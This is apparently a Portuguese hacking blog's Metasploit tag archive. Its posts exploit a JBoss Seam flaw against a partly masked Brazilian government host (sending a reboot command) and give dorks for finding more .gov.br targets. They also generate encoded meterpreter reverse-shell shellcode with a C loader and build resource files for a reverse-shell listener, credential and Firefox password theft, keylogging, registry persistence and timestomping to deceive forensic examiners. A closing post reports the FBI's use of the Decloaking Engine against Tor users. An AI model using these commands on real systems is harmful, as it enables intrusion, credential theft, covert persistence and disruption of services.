Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador Metasploit. Mostrar todas as postagens
Mostrando postagens com marcador Metasploit. Mostrar todas as postagens

sexta-feira, 19 de junho de 2015

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
  • MODULE METASPLOIT:auxiliary/admin/http/jboss_seam_exec
  • COMMAND SCANNER INURLBR:/inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6
  • DORK:site:.gov.br inurl:.seam  intitle:"JBoss Seam Debug"
Configuração:
  • CMD  - The command to execute.
  • RHOST - The target address
  • RPORT  - The target port
  • TARGETURI - Target URI
msf > use auxiliary/admin/http/jboss_seam_exec
msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br
msf auxiliary(jboss_seam_exec) > set RPORT 80
msf auxiliary(jboss_seam_exec) > set CMD reboot
msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam
msf auxiliary(jboss_seam_exec) > exploit

Output:
msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam msf auxiliary(jboss_seam_exec) > exploit

Resultado:

Resultado:

sexta-feira, 29 de maio de 2015

Injeção de shellcode na mémoria

#Shellcode [ CONEXÃO REVERSA ] #Memory


  Eae galera, jh00n aqui novamente :)

  Nesse post irei abordar o tema sobre injeção de uma shellcode na mémoria, mas antes de tudo teremos que gerar uma shellcode usando o msfpayload que está presente no framework Metasploit.

    

root@jh00n:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.19 LPORT=445 R | msfenconde -e x86/shikata_ga_nai -t c -a x64 -b "\x00\x0A\x00" -c 5




  Irei gerar a shellcode utilizando a payload (windows/meterpreter/reverse_tcp). Agora eu terei que definir o ip da máquina que ira se conectar, no parâmetro (LHOST) e a porta que irá também se conectar, no parâmetro (LPORT), e por último definirei o parâmetro (R) para o msfpayload me retornar a shellcode em (R)aw.


   #Msfencode



msfenconde -e x86/shikata_ga_nai -t c -a x64 -b "\x00\x0A\x00" -c 5



  O msfencode será utilizado para encodar a minha shellcode (x86/shikata_ga_nai) agora e vou definir o numéro de vezes que a minha shellcode ira ser codificado no parâmetro (-c 5) nesse caso defini para cinco. (-t) e também irei definir formato de saída"c".  A arquitetura que a shellcode vai utilizar é 64 bits(-a x64). Vou excluir alguns caracteres "inúteis" x00, x0A utilizando o parâmetro (-b)


#Compilando



  Utilizarei o Dev c++ para compilar o programa que ira executar a minha shellcode:


  Utilizarei o Dev c++ para compilar o programa que ira executar a minha shellcode:

  char code[] = "shellcode";
   int main(int argc, char **argv)
  {
   int (*func)();
   func = (int (*)()) code;
   (int)(*func)();
   }


#Aguardando Conexão

   

DEMO

segunda-feira, 23 de fevereiro de 2015

Metasploit automatização resource files

Trabalhando com resource files

O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf  > resource file-to-run.rc)


O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf  > resource file-to-run.rc)



O seguinte exemplo cria um arquivo de recurso para exibir o número da versão do metasploit.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch version.rc
echo 'version' >> version.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run  :  msfconsole -r version.rc
or    :  msfconsole -r /root/version.rc
or    :  msf > resource /root/version.rc



este arquivo de recurso irá carregar um directorio externo (ao msf) para que você possa apontar Metasploit aos seus 0-day, exploits, codificadores, cargas úteis (payloads), se estão a desenvolver exploits, auxiliarys, pós-módulos em ruby, então esta é a opção perfeita para que você possa carregar o seu directorio de trabalho no banco de dados do metasploit.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch startconf.rc
echo 'loadpath /home/secret/0day' >> startconf.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfconsole -r startconf.rc
or     :  msfconsole -r /root/startconf.rc
or     :  msf > resource /root/startconf.rc



Vamos criar um arquivo de recurso para iniciar um multi-manipulador (multi-handler) para nós. 
este 'listenner' vai receber a nossa carga útil (payload) reverse_tcp meterpreter.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch shell_listenner.rc
echo 'use exploit/multi/handler' >> shell_listenner.rc
echo 'set PAYLOAD windows/meterpreter/reverse_tcp' >> shell_listenner.rc
echo 'set LPORT 666' >> shell_listenner.rc
echo 'set LHOST 192.168.1.68' >> shell_listenner.rc
echo 'set ExitOnSession false' >> shell_listenner.rc
echo 'exploit -j -z' >> shell_listenner.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfconsole -r shell_listenner.rc
or     :  msfconsole -r /root/shell_listenner.rc
or     :  msf > resouce shell_listenner.rc



Scripts de auto-run são exelentes quando você precisa que varios módulos executem automaticamente
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch autoruncommands.rc
echo 'run post/windows/manage/migrate' >> autoruncommands.rc
echo 'run post/windows/gather/checkvm' >> autoruncommands.rc
echo 'run post/windows/gather/credential_collector' >> autoruncommands.rc
echo 'run post/multi/gather/firefox_creds' >> autoruncommands.rc
echo 'run post/windows/capture/keylog_recorder' >> autoruncommands.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msf > run multi_console_command -rc /root/autoruncommands.rc
ou executá-la no multi-manipulador (multi-handler) usando a flag AutoRunScript
run   : msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/autoruncommands.rc' E
desta forma só precisamos de configurar o 'autorunscript' para apontar para o nosso arquivo de recursos, de modo que toda a vez que o manipulador (multi-handler) abre uma sessão irá executar todos os modulos escritos dentro do arquivo 'autoruncommands.rc'



O exemplo a seguir mostra como podemos persistir uma carga útil (payload) em post-exploração
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch Post-Auto.rc
echo 'sysinfo' >> Post-Auto.rc
echo 'run migrate -n wininit.exe' >> Post-Auto.rc
echo 'upload /var/www/powershell.bat C:\\windows\\system32\\powershell.bat' >> Post-Auto.rc
echo 'upload /var/www/hidden.vbs C:\\windows\\system32\\hidden.vbs' >> Post-Auto.rc
echo 'reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence -d "C:\windows\system32\hidden.vbs"' >> Post-Auto.rc
echo 'reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' >> Post-Auto.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/Post-Auto.rc' E



Neste proximo exemplo vamos usar o nmap para escanear a nossa rede local em busca de hospedeiros vivos e exportar o relatorio em (.xml) formato, depois vamos construir um arquivo de recurso (msfdb.rc) para podermos exportar o arquivo xml para a base de dados do metasploit, para os hospedeiros encontrados poderem ser usados no metasploit.
escannear usando o nmap:
nmap -sV -Pn -p 1-1000 -O --open -oX /root/Random-Hosts.xml 192.168.1.0/24
contruindo resource file:
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch msfdb.rc
echo 'db_import /root/Random-Hosts.xml' >> /root/msfdb.rc
echo 'hosts' >> /root/msfdb.rc
echo 'sevices' >> /root/msfdb.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
correr metasploit:
service metasploit start
msfconsole -r /root/msfdb.rc
limpar database:
msf > hosts -d
msf > services -d



As vezes no post-exploração precissamos de encobrir os nossos passos no systema alvo para enganar peritos forensicos, uma maneira de fazer isso é manipular o timestomp (mace) de um arquivo ou de um directorio (recursive) no exemplo a seguir vamos fazer o upload de um arquivo para o hospedeiro de destino e mudar o seu valor mace para outra data/hora para que o arquivo pareça ter sido criado/acessado no ano 2013, a flag (-r) permite-nos mudar o mace de todos os arquivos dentro de um directorio.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch mace.rc
echo 'run migrate -n wininit.exe' >> mace.rc
echo 'upload /var/www/powershell.ps1 %temp\\powershell.ps1%' >> mace.rc
echo 'timestomp -r %temp% "21/01/2013 23:26:35"' >> mace.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   : meterpreter > resource /root/mace.rc



O arquivo de recurso seguinte (scanner.rc) requer que o usuário defina RHOSTS globalmente usando: setg RHOSTS 192.168.1.68 (ip alvo) antes de lançar o resource file, e ele se usa do commando 'db_nmap' para salvar o scan feito na base de dados do metasploit. na tag <ruby> usamos o nmap para escannear por vulnerabilidades no protocol smb e samba que serão guardados em 'services' e 'vulns', depois da tag </ruby> o resource file vai se usar dos resultados contidos na DB para correr modulos de post-exploração.
----------------------------------------------------------------------------------------------------------------------------------------------------------
<ruby>
run_single("db_nmap -sU -sS -Pn -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
run_single("services #{framework.datastore['RHOSTS']}")
run_single("vulns #{framework.datastore['RHOSTS']}")
</ruby>
use auxiliary/scanner/snmp/snmp_enum
run
use auxiliary/scanner/snmp/snmp_enumusers
run
use auxiliary/scanner/snmp/snmp_enumshares
run
----------------------------------------------------------------------------------------------------------------------------------------------------------
antes do resource file ser lançado:  msf > setg RHOSTS <target ip>
run  resource file:  msf > resource scanner.rc
unset global var: msf > unsetg RHOSTS
clean msf database: msf > hosts -d






quinta-feira, 18 de dezembro de 2014

FBI usa Metasploit Decloak Para expor os usuários TOR.

Metasploit, uma criação de um hacker(H.D. Moore)  white hat em 2003, foi o mais procuradoa ferramenta de hacking por quase uma década; uma espécie de canivete suíço de hacks que permite que um hacker vasculhe  redes de clientes.  A ferramenta é tão útil  que até mesmo FBI não poderia ficar longe dela. De acordo com um relatório recente da WIRED, FBI usou um código Flash a partir de um projeto paralelo Metasploit abandonado "Decloaking Engine" para identificar os suspeitos que se escondem atrás do anonimato da rede TOR. Decloaking Engine - "Esta ferramenta demonstra um sistema que identifica o endereço IP real de um usuário da web, independentemente das configurações de proxy, usando uma combinação de tecnologias do lado do cliente e serviços personalizados, Usa como componentes JAVA e FLASH Para ser executado lado cliente."


Metasploit, uma criação de um hacker(H.D. Moore)  white hat em 2003, foi o mais procuradoa ferramenta de hacking por quase uma década; uma espécie de canivete suíço de hacks que permite que um hacker vasculhe  redes de clientes.

A ferramenta é tão útil  que até mesmo FBI não poderia ficar longe dela. De acordo com um relatório recente da WIRED, FBI usou um código Flash a partir de um projeto paralelo Metasploit abandonado "Decloaking Engine" para identificar os suspeitos que se escondem atrás do anonimato da rede TOR.
Decloaking Engine - "Esta ferramenta demonstra um sistema que identifica o endereço IP real de um usuário da web, independentemente das configurações de proxy, usando uma combinação de tecnologias do lado do cliente e serviços personalizados, Usa como componentes JAVA e FLASH
Para ser executado lado cliente."


JAVA::    https://web.archive.org/web/20110314002349/http://decloak.net/HelloWorld.java
FLASH:https://web.archive.org/web/20110723083748/http://decloak.net/Decloak.hx

A ferramenta foi utilizada em "Operation Torpedo", uma operação policial visando três usuários dos sites da DarkNet/DW de pornografia infantil. Um advogado de um dos réus está agora desafiando a confiabilidade do hackerware como uma evidência científica admissível no Supremo Tribunal Federal.

O assunto será tratado em tribunal em 23 de fevereiro de 2015.

Tor, um projeto livre, de código aberto, é um software de anonimato que protege os usuários por roteamento de tráfego por meio de conexões criptografadas. Ele é bastante popular entre os criminosos, ativistas de direitos humanos, ativistas, jornalistas, hacking e denunciantes.
O software processa um servidor web inútil para as autoridades de aplicação da lei, porque enfatiza a informação muito limitada sobre um usuário para o nó Tor mais próximo.

Metasploit, criado em 2003, é um open-source ferramenta de teste de penetração que permite aos usuários organizar e efetuar ataques de componentes. Mais tarde, em 2006, Moore lançou o "Metasploit Decloaking Engine," Com cinco truques, para romper sistemas de anonimato.
No entanto, qualquer erro exporia a identidade do utilizador.

Decloaking Engine, como implantação de spyware, é bastante leve e foi usado contra cada visitante do site, um caso de implantação de spyware em massa. A Conferência Judicial dos Estados Unidos está trabalhando em uma petição do Departamento de Justiça para permitir explicitamente implantações de spyware.

Enquanto isso está acontecendo, capacidades anti-tor do FBI realmente melhoraram de forma alarmante.

"No curso de nove meses, eles foram de fora as técnicas de Flash que simplesmente se aproveitam da falta de proteção proxy, para explorações do navegador custom-built", diz Chris Soghoian, principal tecnólogo na ACLU.

http://hackread.com/fbi-used-metasploit-decloak-expose-tor-users/